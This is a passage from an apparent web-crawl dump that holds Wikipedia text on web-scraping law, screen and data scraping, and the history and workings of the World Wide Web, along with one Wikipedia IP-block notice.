unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
130 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=18 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
131 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Screen_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
132 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/World_Wide_Web | The World Wide Web (WWW or simply the Web) is an information system that enables content sharing over the Internet through user-friendly ways meant to appeal to users beyond IT specialists and hobbyists. 1 It allows documents and other web resources to be accessed over the Internet according to specific rules of the Hypertext Transfer Protocol (HTTP). 2 The Web was invented by English computer scientist Tim Berners-Lee while at CERN in 1989 and opened to the public in 1991. It was conceived as a "universal linked information system". 3 4 Documents and other media content are made available to the network through web servers and can be accessed by programs such as web browsers. Servers and resources on the World Wide Web are identified and located through character strings called uniform resource locators (URLs). The original and still very common document type is a web page formatted in Hypertext Markup Language (HTML). This markup language supports plain text, images, embedded video and audio contents, and scripts (short programs) that implement complex user interaction. The HTML language also supports hyperlinks (embedded URLs) which provide immediate access to other web resources. Web navigation, or web surfing, is the common practice of following such hyperlinks across multiple websites. Web applications are web pages that function as application software. The information in the Web is transferred across the Internet using HTTP. Multiple web resources with a common theme and usually a common domain name make up a website. A single web server may provide multiple websites, while some websites, especially the most popular ones, may be provided by multiple servers. Website content is provided by a myriad of companies, organizations, government agencies, and individual users; and comprises an enormous amount of educational, entertainment, commercial, and government information. The Web has become the world's dominant information systems platform. 5 6 7 8 It is the primary tool that billions of people worldwide use to interact with the Internet. 2 The Web was invented by English computer scientist Tim Berners-Lee while working at CERN. 9 10 He was motivated by the problem of storing, updating, and finding documents and data files in that large and constantly changing organization, as well as distributing them to collaborators outside CERN. In his design, Berners-Lee dismissed the common tree structure approach, used for instance in the existing CERNDOC documentation system and in the Unix filesystem, as well as approaches that relied in tagging files with keywords, as in the VAX NOTES system. Instead he adopted concepts he had put into practice with his private ENQUIRE system (1980) built at CERN. When he became aware of Ted Nelson's hypertext model (1965), in which documents can be linked in unconstrained ways through hyperlinks associated with "hot spots" embedded in the text, it helped to confirm the validity of his concept. 11 12 The model was later popularized by Apple's HyperCard system. Unlike Hypercard, Berners-Lee's new system from the outset was meant to support links between multiple databases on independent computers, and to allow simultaneous access by many users from any computer on the Internet. He also specified that the system should eventually handle other media besides text, such as graphics, speech, and video. Links could refer to mutable data files, or even fire up programs on their server computer. He also conceived "gateways" that would allow access through the new system to documents organized in other ways (such as traditional computer file systems or the Usenet). Finally, he insisted that the system should be decentralized, without any central control or coordination over the creation of links. 3 13 9 10 Berners-Lee submitted a proposal to CERN in May 1989, without giving the system a name. 3 He got a working system implemented by the end of 1990, including a browser called WorldWideWeb (which became the name of the project and of the network) and an HTTP server running at CERN. As part of that development he defined the first version of the HTTP protocol, the basic URL syntax, and implicitly made HTML the primary document format. 14 The technology was released outside CERN to other research institutions starting in January 1991, and then to the whole Internet on 23 August 1991. The Web was a success at CERN, and began to spread to other scientific and academic institutions. Within the next two years, there were 50 websites created. 15 16 CERN made the Web protocol and code available royalty free in 1993, enabling its widespread use. 17 18 After the NCSA released the Mosaic web browser later that year, the Web's popularity grew rapidly as thousands of websites sprang up in less than a year. 19 20 Mosaic was a graphical browser that could display inline images and submit forms that were processed by the HTTPd server. 21 22 Marc Andreessen and Jim Clark founded Netscape the following year and released the Navigator browser, which introduced Java and JavaScript to the Web. It quickly became the dominant browser. Netscape became a public company in 1995 which triggered a frenzy for the Web and started the dot-com bubble. 23 Microsoft responded by developing its own browser, Internet Explorer, starting the browser wars. By bundling it with Windows, it became the dominant browser for 14 years. 24 Berners-Lee founded the World Wide Web Consortium (W3C) which created XML in 1996 and recommended replacing HTML with stricter XHTML. 25 In the meantime, developers began exploiting an IE feature called XMLHttpRequest to make Ajax applications and launched the Web 2.0 revolution. Mozilla, Opera, and Apple rejected XHTML and created the WHATWG which developed HTML5. 26 In 2009, the W3C conceded and abandoned XHTML. 27 In 2019, it ceded control of the HTML specification to the WHATWG. 28 The World Wide Web has been central to the development of the Information Age and is the primary tool billions of people use to interact on the Internet. 29 30 31 8 Tim Berners-Lee states that World Wide Web is officially spelled as three separate words, each capitalised, with no intervening hyphens. 32 Nonetheless, it is often called simply the Web, and also often the web; see Capitalization of Internet for details. In Mandarin Chinese, World Wide Web is commonly translated via a phono-semantic matching to w n w i w ng ( ), which satisfies www and literally means "10,000 dimensional net", a translation that reflects the design concept and proliferation of the World Wide Web. Use of the www prefix has been declining, especially when web applications sought to brand their domain names and make them easily pronounceable. As the mobile Web grew in popularity, citation needed services like Gmail.com, Outlook.com, Myspace.com, Facebook.com and Twitter.com are most often mentioned without adding "www. (or, indeed, .com") to the domain. 33 In English, www is usually read as double-u double-u double-u. 34 Some users pronounce it dub-dub-dub, particularly in New Zealand. 35 Stephen Fry, in his "Podgrams" series of podcasts, pronounces it wuh wuh wuh. 36 The English writer Douglas Adams once quipped in The Independent on Sunday (1999): "The World Wide Web is the only thing I know of whose shortened form takes three times longer to say than what it's short for". 37 The terms Internet and World Wide Web are often used without much distinction. However, the two terms do not mean the same thing. The Internet is a global system of computer networks interconnected through telecommunications and optical networking. In contrast, the World Wide Web is a global collection of documents and other resources, linked by hyperlinks and URIs. Web resources are accessed using HTTP or HTTPS, which are application-level Internet protocols that use the Internet's transport protocols. 2 Viewing a web page on the World Wide Web normally begins either by typing the URL of the page into a web browser or by following a hyperlink to that page or resource. The web browser then initiates a series of background communication messages to fetch and display the requested page. In the 1990s, using a browser to view web pages—and to move from one web page to another through hyperlinks—came to be known as 'browsing, 'web surfing' (after channel surfing), or 'navigating the Web'. Early studies of this new behaviour investigated user patterns in using web browsers. One study, for example, found five user patterns: exploratory surfing, window surfing, evolved surfing, bounded navigation and targeted navigation. 38 The following example demonstrates the functioning of a web browser when accessing a page at the URL http: example.org home.html. The browser resolves the server name of the URL (example.org) into an Internet Protocol address using the globally distributed Domain Name System (DNS). This lookup returns an IP address such as 203.0.113.4 or 2001:db8:2e::7334. The browser then requests the resource by sending an HTTP request across the Internet to the computer at that address. It requests service from a specific TCP port number that is well known for the HTTP service so that the receiving host can distinguish an HTTP request from other network protocols it may be servicing. HTTP normally uses port number 80 and for HTTPS it normally uses port number 443. The content of the HTTP request can be as simple as two lines of text: The computer receiving the HTTP request delivers it to web server software listening for requests on port 80. If the webserver can fulfil the request it sends an HTTP response back to the browser indicating success: followed by the content of the requested page. Hypertext Markup Language (HTML) for a basic web page might look like this: The web browser parses the HTML and interprets the markup ( title , p for paragraph, and such) that surrounds the words to format the text on the screen. Many web pages use HTML to reference the URLs of other resources such as images, other embedded media, scripts that affect page behaviour, and Cascading Style Sheets that affect page layout. The browser makes additional HTTP requests to the web server for these other Internet media types. As it receives their content from the web server, the browser progressively renders the page onto the screen as specified by its HTML and these additional resources. Hypertext Markup Language (HTML) is the standard markup language for creating web pages and web applications. With Cascading Style Sheets (CSS) and JavaScript, it forms a triad of cornerstone technologies for the World Wide Web. 39 Web browsers receive HTML documents from a web server or from local storage and render the documents into multimedia web pages. HTML describes the structure of a web page semantically and originally included cues for the appearance of the document. HTML elements are the building blocks of HTML pages. With HTML constructs, images and other objects such as interactive forms may be embedded into the rendered page. HTML provides a means to create structured documents by denoting structural semantics for text such as headings, paragraphs, lists, links, quotes and other items. HTML elements are delineated by tags, written using angle brackets. Tags such as img and input directly introduce content into the page. Other tags such as p surround and provide information about document text and may include other tags as sub-elements. Browsers do not display the HTML tags, but use them to interpret the content of the page. HTML can embed programs written in a scripting language such as JavaScript, which affects the behaviour and content of web pages. Inclusion of CSS defines the look and layout of content. The World Wide Web Consortium (W3C), maintainer of both the HTML and the CSS standards, has encouraged the use of CSS over explicit presentational HTML since 1997. update 40 Most web pages contain hyperlinks to other related pages and perhaps to downloadable files, source documents, definitions and other web resources. In the underlying HTML, a hyperlink looks like this: a href "http: example.org home.html" Example.org Homepage a . Such a collection of useful, related resources, interconnected via hypertext links is dubbed a web of information. Publication on the Internet created what Tim Berners-Lee first called the WorldWideWeb (in its original CamelCase, which was subsequently discarded) in November 1990. 41 The hyperlink structure of the web is described by the webgraph: the nodes of the web graph correspond to the web pages (or URLs) the directed edges between them to the hyperlinks. Over time, many web resources pointed to by hyperlinks disappear, relocate, or are replaced with different content. This makes hyperlinks obsolete, a phenomenon referred to in some circles as link rot, and the hyperlinks affected by it are often called "dead" links. The ephemeral nature of the Web has prompted many efforts to archive websites. The Internet Archive, active since 1996, is the best known of such efforts. Many hostnames used for the World Wide Web begin with www because of the long-standing practice of naming Internet hosts according to the services they provide. The hostname of a web server is often www, in the same way that it may be ftp for an FTP server, and news or nntp for a Usenet news server. These hostnames appear as Domain Name System (DNS) or subdomain names, as in www.example.com. The use of www is not required by any technical or policy standard and many web sites do not use it; the first web server was nxoc01.cern.ch. 42 According to Paolo Palazzi, who worked at CERN along with Tim Berners-Lee, the popular use of www as subdomain was accidental; the World Wide Web project page was intended to be published at www.cern.ch while info.cern.ch was intended to be the CERN home page; however the DNS records were never switched, and the practice of prepending www to an institution's website domain name was subsequently copied. 43 better source needed Many established websites still use the prefix, or they employ other subdomain names such as www2, secure or en for special purposes. Many such web servers are set up so that both the main domain name (e.g., example.com) and the www subdomain (e.g., www.example.com) refer to the same site; others require one form or the other, or they may map to different web sites. The use of a subdomain name is useful for load balancing incoming web traffic by creating a CNAME record that points to a cluster of web servers. Since, currently as of? , only a subdomain can be used in a CNAME, the same result cannot be achieved by using the bare domain root. 44 dubious discuss When a user submits an incomplete domain name to a web browser in its address bar input field, some web browsers automatically try adding the prefix "www" to the beginning of it and possibly .com", .org" and .net" at the end, depending on what might be missing. For example, entering "microsoft" may be transformed to http: www.microsoft.com and "openoffice" to http: www.openoffice.org. This feature started appearing in early versions of Firefox, when it still had the working title 'Firebird' in early 2003, from an earlier practice in browsers such as Lynx. 45 unreliable source? It is reported that Microsoft was granted a US patent for the same idea in 2008, but only for mobile devices. 46 The scheme specifiers http: and https: at the start of a web URI refer to Hypertext Transfer Protocol or HTTP Secure, respectively. They specify the communication protocol to use for the request and response. The HTTP protocol is fundamental to the operation of the World Wide Web, and the added encryption layer in HTTPS is essential when browsers send or retrieve confidential data, such as passwords or banking information. Web browsers usually automatically prepend http: to user-entered URIs, if omitted. A web page (also written as webpage) is a document that is suitable for the World Wide Web and web browsers. A web browser displays a web page on a monitor or mobile device. The term web page usually refers to what is visible, but may also refer to the contents of the computer file itself, which is usually a text file containing hypertext written in HTML or a comparable markup language. Typical web pages provide hypertext for browsing to other web pages via hyperlinks, often referred to as links. Web browsers will frequently have to access multiple web resource elements, such as reading style sheets, scripts, and images, while presenting each web page. On a network, a web browser can retrieve a web page from a remote web server. The web server may restrict access to a private network such as a corporate intranet. The web browser uses the Hypertext Transfer Protocol (HTTP) to make such requests to the web server. A static web page is delivered exactly as stored, as web content in the web server's file system. In contrast, a dynamic web page is generated by a web application, usually driven by server-side software. Dynamic web pages are used when each user may require completely different information, for example, bank websites, web email etc. A static web page (sometimes called a flat page stationary page) is a web page that is delivered to the user exactly as stored, in contrast to dynamic web pages which are generated by a web application. Consequently, a static web page displays the same information for all users, from all contexts, subject to modern capabilities of a web server to negotiate content-type or language of the document where such versions are available and the server is configured to do so. A server-side dynamic web page is a web page whose construction is controlled by an application server processing server-side scripts. In server-side scripting, parameters determine how the assembly of every new web page proceeds, including the setting up of more client-side processing. A client-side dynamic web page processes the web page using JavaScript running in the browser. JavaScript programs can interact with the document via Document Object Model, or DOM, to query page state and alter it. The same client-side techniques can then dynamically update or change the DOM in the same way. A dynamic web page is then reloaded by the user or by a computer program to change some variable content. The updating information could come from the server, or from changes made to that page's DOM. This may or may not truncate the browsing history or create a saved version to go back to, but a dynamic web page update using Ajax technologies will neither create a page to go back to nor truncate the web browsing history forward of the displayed page. Using Ajax technologies the end user gets one dynamic page managed as a single page in the web browser while the actual web content rendered on that page can vary. The Ajax engine sits only on the browser requesting parts of its DOM, the DOM, for its client, from an application server. Dynamic HTML, or DHTML, is the umbrella term for technologies and methods used to create web pages that are not static web pages, though it has fallen out of common use since the popularization of AJAX, a term which is now itself rarely used. citation needed Client-side-scripting, server-side scripting, or a combination of these make for the dynamic web experience in a browser. JavaScript is a scripting language that was initially developed in 1995 by Brendan Eich, then of Netscape, for use within web pages. 47 The standardised version is ECMAScript. 47 To make web pages more interactive, some web applications also use JavaScript techniques such as Ajax (asynchronous JavaScript and XML). Client-side script is delivered with the page that can make additional HTTP requests to the server, either in response to user actions such as mouse movements or clicks, or based on elapsed time. The server's responses are used to modify the current page rather than creating a new page with each response, so the server needs only to provide limited, incremental information. Multiple Ajax requests can be handled at the same time, and users can interact with the page while data is retrieved. Web pages may also regularly poll the server to check whether new information is available. 48 A website 49 is a collection of related web resources including web pages, multimedia content, typically identified with a common domain name, and published on at least one web server. Notable examples are wikipedia.org, google.com, and amazon.com. A website may be accessible via a public Internet Protocol (IP) network, such as the Internet, or a private local area network (LAN), by referencing a uniform resource locator (URL) that identifies the site. Websites can have many functions and can be used in various fashions; a website can be a personal website, a corporate website for a company, a government website, an organization website, etc. Websites are typically dedicated to a particular topic or purpose, ranging from entertainment and social networking to providing news and education. All publicly accessible websites collectively constitute the World Wide Web, while private websites, such as a company's website for its employees, are typically a part of an intranet. Web pages, which are the building blocks of websites, are documents, typically composed in plain text interspersed with formatting instructions of Hypertext Markup Language (HTML, XHTML). They may incorporate elements from other websites with suitable markup anchors. Web pages are accessed and transported with the Hypertext Transfer Protocol (HTTP), which may optionally employ encryption (HTTP Secure, HTTPS) to provide security and privacy for the user. The user's application, often a web browser, renders the page content according to its HTML markup instructions onto a display terminal. Hyperlinking between web pages conveys to the reader the site structure and guides the navigation of the site, which often starts with a home page containing a directory of the site web content. Some websites require user registration or subscription to access content. Examples of subscription websites include many business sites, news websites, academic journal websites, gaming websites, file-sharing websites, message boards, web-based email, social networking websites, websites providing real-time price quotations for different types of markets, as well as sites providing various other services. End users can access websites on a range of devices, including desktop and laptop computers, tablet computers, smartphones and smart TVs. A web browser (commonly referred to as a browser) is a software user agent for accessing information on the World Wide Web. To connect to a website's server and display its pages, a user needs to have a web browser program. This is the program that the user runs to download, format, and display a web page on the user's computer. In addition to allowing users to find, display, and move between web pages, a web browser will usually have features like keeping bookmarks, recording history, managing cookies (see below), and home pages and may have facilities for recording passwords for logging into web sites. The most popular browsers are Chrome, Firefox, Safari, Internet Explorer, and Edge. A Web server is server software, or hardware dedicated to running said software, that can satisfy World Wide Web client requests. A web server can, in general, contain one or more websites. A web server processes incoming network requests over HTTP and several other related protocols. The primary function of a web server is to store, process and deliver web pages to clients. 50 The communication between client and server takes place using the Hypertext Transfer Protocol (HTTP). Pages delivered are most frequently HTML documents, which may include images, style sheets and scripts in addition to the text content. A user agent, commonly a web browser or web crawler, initiates communication by making a request for a specific resource using HTTP and the server responds with the content of that resource or an error message if unable to do so. The resource is typically a real file on the server's secondary storage, but this is not necessarily the case and depends on how the webserver is implemented. While the primary function is to serve content, full implementation of HTTP also includes ways of receiving content from clients. This feature is used for submitting web forms, including uploading of files. Many generic web servers also support server-side scripting using Active Server Pages (ASP), PHP (Hypertext Preprocessor), or other scripting languages. This means that the behaviour of the webserver can be scripted in separate files, while the actual server software remains unchanged. Usually, this function is used to generate HTML documents dynamically ("on-the-fly") as opposed to returning static documents. The former is primarily used for retrieving or modifying information from databases. The latter is typically much faster and more easily cached but cannot deliver dynamic content. Web servers can also frequently be found embedded in devices such as printers, routers, webcams and serving only a local network. The web server may then be used as a part of a system for monitoring or administering the device in question. This usually means that no additional software has to be installed on the client computer since only a web browser is required (which now is included with most operating systems). An HTTP cookie (also called web cookie, Internet cookie, browser cookie, or simply cookie) is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added in the shopping cart in an online store) or to record the user's browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to remember arbitrary pieces of information that the user previously entered into form fields such as names, addresses, passwords, and credit card numbers. Cookies perform essential functions in the modern web. Perhaps most importantly, authentication cookies are the most common method used by web servers to know whether the user is logged in or not, and which account they are logged in with. Without such a mechanism, the site would not know whether to send a page containing sensitive information or require the user to authenticate themselves by logging in. The security of an authentication cookie generally depends on the security of the issuing website and the user's web browser, and on whether the cookie data is encrypted. Security vulnerabilities may allow a cookie's data to be read by a hacker, used to gain access to user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see cross-site scripting and cross-site request forgery for examples). 51 Tracking cookies, and especially third-party tracking cookies, are commonly used as ways to compile long-term records of individuals' browsing histories a potential privacy concern that prompted European 52 and U.S. lawmakers to take action in 2011. 53 54 European law requires that all websites targeting European Union member states gain "informed consent" from users before storing non-essential cookies on their device. Google Project Zero researcher Jann Horn describes ways cookies can be read by intermediaries, like Wi-Fi hotspot providers. When in such circumstances, he recommends using the browser in private browsing mode (widely known as Incognito mode in Google Chrome). 55 A web search engine or Internet search engine is a software system that is designed to carry out web search (Internet search), which means to search the World Wide Web in a systematic way for particular information specified in a web search query. The search results are generally presented in a line of results, often referred to as search engine results pages (SERPs). The information may be a mix of web pages, images, videos, infographics, articles, research papers, and other types of files. Some search engines also mine data available in databases or open directories. Unlike web directories, which are maintained only by human editors, search 